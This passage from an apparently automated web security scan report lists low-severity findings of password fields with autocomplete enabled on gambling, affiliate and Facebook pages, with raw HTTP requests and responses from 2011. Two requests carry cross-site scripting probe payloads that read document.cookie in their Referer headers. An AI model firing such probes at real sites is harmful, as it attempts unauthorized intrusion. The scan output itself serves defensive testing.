Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.103. http://twitter.com/ukscratch previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ukscratch

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /ukscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.104. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The page contains a form with the following action URL:

https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?CMI=1

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET /WebSite/Affiliates/login.aspx?CMI=1 HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?CMI=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:46:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<body style="margin:0px;">
<form name="form1" method="post" action="login.aspx?CMI=1" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" maxlength="16" id="txtPassword" tabindex="51" class="AffiliatesHeaderLoginTextbox" />
</td>
...[SNIP]...

13.105. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The page contains a form with the following action URL:

https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET /WebSite/Affiliates/login.aspx HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:47:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<body style="margin:0px;">
<form name="form1" method="post" action="login.aspx" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" maxlength="16" id="txtPassword" tabindex="51" class="AffiliatesHeaderLoginTextbox" />
</td>
...[SNIP]...

13.106. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The page contains a form with the following action URL:

https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?a034a%5c

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET /WebSite/Affiliates/login.aspx?a034a\ HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?a034a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E761a7e15528=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:24:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<body style="margin:0px;">
<form name="form1" method="post" action="login.aspx?a034a%5c" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" maxlength="16" id="txtPassword" tabindex="51" class="AffiliatesHeaderLoginTextbox" />
</td>
...[SNIP]...

13.107. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The page contains a form with the following action URL:

https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%5c

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET /WebSite/Affiliates/login.aspx?d0cc2\ HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:46:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<body style="margin:0px;">
<form name="form1" method="post" action="login.aspx?d0cc2%5c" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" maxlength="16" id="txtPassword" tabindex="51" class="AffiliatesHeaderLoginTextbox" />
</td>
...[SNIP]...

13.108. http://www.bet365.com/extra/en/betting/in-play previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/betting/in-play

Issue detail

The page contains a form with the following action URL:

http://www.bet365.com/extra/en/betting/in-play/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

Response

13.109. http://www.bet365.com/extra/en/betting/live-streaming previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/betting/live-streaming

Issue detail

The page contains a form with the following action URL:

http://www.bet365.com/extra/en/betting/live-streaming/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

Response

13.110. http://www.bet365.com/extra/en/mobile/introduction/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/mobile/introduction/

Issue detail

The page contains a form with the following action URL:

http://www.bet365.com/extra/en/mobile/introduction/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

Response

13.111. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/promotions/horse-racing/best-odds-guaranteed

Issue detail

The page contains a form with the following action URL:

http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

Response

13.112. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/promotions/soccer/bore-draw-money-back

Issue detail

The page contains a form with the following action URL:

http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

Response

13.113. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/promotions/soccer/soccer-accumulator-bonus

Issue detail

The page contains a form with the following action URL:

http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

Response

13.114. https://www.betsson.com/start/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/start/en/

Issue detail

The page contains a form with the following action URL:

https://www.betsson.com/start/en/

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /start/en/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.115. https://www.betsson.com/start/is/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/start/is/

Issue detail

The page contains a form with the following action URL:

https://www.betsson.com/start/is/

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /start/is/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:50 GMT
Connection: close
Content-Length: 39256
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.116. https://www.betsson.com/web/en/sportsbook/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/web/en/sportsbook/

Issue detail

The page contains a form with the following action URL:

https://www.betsson.com/web/en/sportsbook/

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /web/en/sportsbook/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 78630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hrdmunq10h1upatzji4snpvl; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 16 May 2011 12:08:59 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.117. http://www.crazyrewards.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.crazyrewards.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://partners.crazyrewards.com/login.asp

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.crazyrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.118. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.119. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/?ref=ts

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

GET /?ref=ts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTSnNr7_aB426uwgNhTYi; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=9diln; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.104.41
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="0c8389686ea405c1f0d6cb61733a30bf" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

13.120. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="0c8389686ea405c1f0d6cb61733a30bf" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

13.121. http://www.facebook.com/PrimeScratchCards previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/PrimeScratchCards

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.122. http://www.facebook.com/WinningsCom previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/WinningsCom

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.123. http://www.facebook.com/crazyscratch previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crazyscratch

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.124. http://www.facebook.com/peoplespostcodelottery previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peoplespostcodelottery

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.125. http://www.heavenaffiliates.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.heavenaffiliates.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://affiliates.heavenaffiliates.com/login_cust.asp

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.heavenaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.126. https://www.interwetten.com/Header-Contact previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/Header-Contact

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/Header-Contact?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Contact

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /Header-Contact HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:43:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:58 GMT
Connection: close
Content-Length: 48202
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Contact?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Contact" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

